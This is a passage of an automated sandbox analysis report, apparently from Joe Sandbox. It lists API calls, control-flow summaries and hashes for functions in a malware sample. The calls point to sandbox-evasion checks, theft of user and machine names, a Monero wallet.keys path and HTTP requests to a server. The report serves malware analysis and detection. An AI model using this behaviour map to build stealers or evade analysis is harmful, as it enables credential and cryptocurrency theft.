                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: 5caf66791c8dc2f123a2fc11371fa0f557305c9485a6a0950c91eb4413a9821d
                                      • Instruction ID: 96d3d34bd1a8e3443e124bacfababc2d2c36cd0d0158f10e26c78edb20f4e32a
                                      • Opcode Fuzzy Hash: 5caf66791c8dc2f123a2fc11371fa0f557305c9485a6a0950c91eb4413a9821d
                                      • Instruction Fuzzy Hash: E851B178B0420AEFDB14DFD4E954BAE37B9FF94304F104058E412AB280EB74E941EB66
                                      Function 00F26C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82470), ref: 00F29BF1
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82260), ref: 00F29C0A
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82368), ref: 00F29C22
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82278), ref: 00F29C3A
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82338), ref: 00F29C53
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D89138), ref: 00F29C6B
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D75A70), ref: 00F29C83
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D75730), ref: 00F29C9C
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82488), ref: 00F29CB4
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D823B0), ref: 00F29CCC
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82290), ref: 00F29CE5
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D823C8), ref: 00F29CFD
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D75770), ref: 00F29D15
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D823F8), ref: 00F29D2E
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F111D0: ExitProcess.KERNEL32 ref: 00F11211
                                        • Part of subcall function 00F11160: GetSystemInfo.KERNEL32(?), ref: 00F1116A
                                        • Part of subcall function 00F11160: ExitProcess.KERNEL32 ref: 00F1117E
                                        • Part of subcall function 00F11110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F1112B
                                        • Part of subcall function 00F11110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00F11132
                                        • Part of subcall function 00F11110: ExitProcess.KERNEL32 ref: 00F11143
                                        • Part of subcall function 00F11220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F1123E
                                        • Part of subcall function 00F11220: __aulldiv.LIBCMT ref: 00F11258
                                        • Part of subcall function 00F11220: __aulldiv.LIBCMT ref: 00F11266
                                        • Part of subcall function 00F11220: ExitProcess.KERNEL32 ref: 00F11294
                                        • Part of subcall function 00F26A10: GetUserDefaultLangID.KERNEL32 ref: 00F26A14
                                        • Part of subcall function 00F11190: ExitProcess.KERNEL32 ref: 00F111C6
                                        • Part of subcall function 00F279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F111B7), ref: 00F27A10
                                        • Part of subcall function 00F279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F27A17
                                        • Part of subcall function 00F279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F27A2F
                                        • Part of subcall function 00F27A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27AA0
                                        • Part of subcall function 00F27A70: RtlAllocateHeap.NTDLL(00000000), ref: 00F27AA7
                                        • Part of subcall function 00F27A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00F27ABF
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01D89158,?,00F310F4,?,00000000,?,00F310F8,?,00000000,00F30AF3), ref: 00F26D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F26D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00F26D99
                                      • Sleep.KERNEL32(00001770), ref: 00F26DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01D89158,?,00F310F4,?,00000000,?,00F310F8,?,00000000,00F30AF3), ref: 00F26DBA
                                      • ExitProcess.KERNEL32 ref: 00F26DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: da9b206631ac6dfb90671fb8d4427d6ba5fa5dde1714a11a968bbb4cf429b448
                                      • Instruction ID: 43553b0a3ffd31e45a23e5a9ce45da3c34b183f2a84ce19a4dca60ffdba355a0
                                      • Opcode Fuzzy Hash: da9b206631ac6dfb90671fb8d4427d6ba5fa5dde1714a11a968bbb4cf429b448
                                      • Instruction Fuzzy Hash: DB310F71A44228ABDB08F7F0EC67BEE7379BF44310F500928F512A6181DF789945E762
                                      Function 00F11220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1436 f11220-f11247 call f28b40 GlobalMemoryStatusEx 1439 f11273-f1127a 1436->1439 1440 f11249-f11271 call f2dd30 * 2 1436->1440 1442 f11281-f11285 1439->1442 1440->1442 1444 f11287 1442->1444 1445 f1129a-f1129d 1442->1445 1446 f11292-f11294 ExitProcess 1444->1446 1447 f11289-f11290 1444->1447 1447->1445 1447->1446
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F1123E
                                      • __aulldiv.LIBCMT ref: 00F11258
                                      • __aulldiv.LIBCMT ref: 00F11266
                                      • ExitProcess.KERNEL32 ref: 00F11294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 0494f2afdc94cb5f0c4f041d671b193e72471bfa11c238b29da414d428b333c2
                                      • Instruction ID: 62c66a7791f57f06a7e33d624c8867388471ef92bc28f1fd7884eef823851c7e
                                      • Opcode Fuzzy Hash: 0494f2afdc94cb5f0c4f041d671b193e72471bfa11c238b29da414d428b333c2
                                      • Instruction Fuzzy Hash: 6F016DB0D40318BBEF10DFE0DC4ABEEBBB8BB14705F608458E704BA1C0C67855859B99
                                      Function 00F26D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1450 f26d93 1451 f26daa 1450->1451 1453 f26d5a-f26d77 call f2ade0 OpenEventA 1451->1453 1454 f26dac-f26dc2 call f26bc0 call f25d60 CloseHandle ExitProcess 1451->1454 1460 f26d95-f26da4 CloseHandle Sleep 1453->1460 1461 f26d79-f26d91 call f2ade0 CreateEventA 1453->1461 1460->1451 1461->1454
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01D89158,?,00F310F4,?,00000000,?,00F310F8,?,00000000,00F30AF3), ref: 00F26D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F26D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00F26D99
                                      • Sleep.KERNEL32(00001770), ref: 00F26DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01D89158,?,00F310F4,?,00000000,?,00F310F8,?,00000000,00F30AF3), ref: 00F26DBA
                                      • ExitProcess.KERNEL32 ref: 00F26DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 4978723f60ae4e9a92f4d3085d6d5d4b7131c4f99d7151fdb7c6ca8fa3ac46fc
                                      • Instruction ID: 30938dab23974298ab8f2d20bc0b81dedb757070d7c33a6e63d42b4549dc9d0f
                                      • Opcode Fuzzy Hash: 4978723f60ae4e9a92f4d3085d6d5d4b7131c4f99d7151fdb7c6ca8fa3ac46fc
                                      • Instruction Fuzzy Hash: 3AF0FE30A44229EFEB14ABE0FD0ABBD77B4AF14711F900525F922E91C5CBB45940EB95
                                      Function 00F14800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F14889
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14899
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: 72d43f2e395a970e5b858a36951884d8bbebe81c0956cf0e3036346ebdc8bb37
                                      • Instruction ID: a716bdbafd798c2200f47e3de1b8fa0dd5b141b9939cab145d8f363f2f5d5983
                                      • Opcode Fuzzy Hash: 72d43f2e395a970e5b858a36951884d8bbebe81c0956cf0e3036346ebdc8bb37
                                      • Instruction Fuzzy Hash: E1211FB1D00209ABDF14DFA4EC45ADD7B75FB45321F108625F925A72C0DB746A05CF91
                                      Function 00F25440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F162D0: InternetOpenA.WININET(00F30DFF,00000001,00000000,00000000,00000000), ref: 00F16331
                                        • Part of subcall function 00F162D0: StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F16353
                                        • Part of subcall function 00F162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F16385
                                        • Part of subcall function 00F162D0: HttpOpenRequestA.WININET(00000000,GET,?,01D8E3C8,00000000,00000000,00400100,00000000), ref: 00F163D5
                                        • Part of subcall function 00F162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F1640F
                                        • Part of subcall function 00F162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F16421
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25478
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 2c312c40f830acdecb806f2d064cc5d82c334b198cd0d2c6441fb5eea697bc2c
                                      • Instruction ID: 1828cbb3e5bf76b276e56727c726c36ea6f5ee557b27ef33f726f5837809533d
                                      • Opcode Fuzzy Hash: 2c312c40f830acdecb806f2d064cc5d82c334b198cd0d2c6441fb5eea697bc2c
                                      • Instruction Fuzzy Hash: 901129709001189BCB14FFA4ED63EED7339AF50340F804558F91A57492EF38AB48EB51
                                      Function 00F27A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27AA0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F27AA7
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00F27ABF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: ac413e32905b92376580f98ef9edba2a4ce2c7e6fefd7875b5778f8dd9e042fa
                                      • Instruction ID: 00a19f455463bb233c18bd18a32dae6b45e46b29a18369b0e2c0fb5248e6f6ee
                                      • Opcode Fuzzy Hash: ac413e32905b92376580f98ef9edba2a4ce2c7e6fefd7875b5778f8dd9e042fa
                                      • Instruction Fuzzy Hash: 8801D6B1908359ABD714DFC8E845BAFBBB8F704720F10012AF511E72C0D7745A009BE1
                                      Function 00F11110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F1112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00F11132
                                      • ExitProcess.KERNEL32 ref: 00F11143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: f3916820b053aa1e0a9ecd5c53dc210ae03a6c040d215f3d5a7bf690fa3f99ed
                                      • Instruction ID: f9cd34d54703f1ab52c0f971fa2bc3c977b25b45822b19be8bb7e9e86e5ebadc
                                      • Opcode Fuzzy Hash: f3916820b053aa1e0a9ecd5c53dc210ae03a6c040d215f3d5a7bf690fa3f99ed
                                      • Instruction Fuzzy Hash: B8E08670D45308FBF724ABD09C0AB4C76ACAB04B11F100154F7187A1C0C6B425C05798
                                      Function 00F110A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00F110B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00F110F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
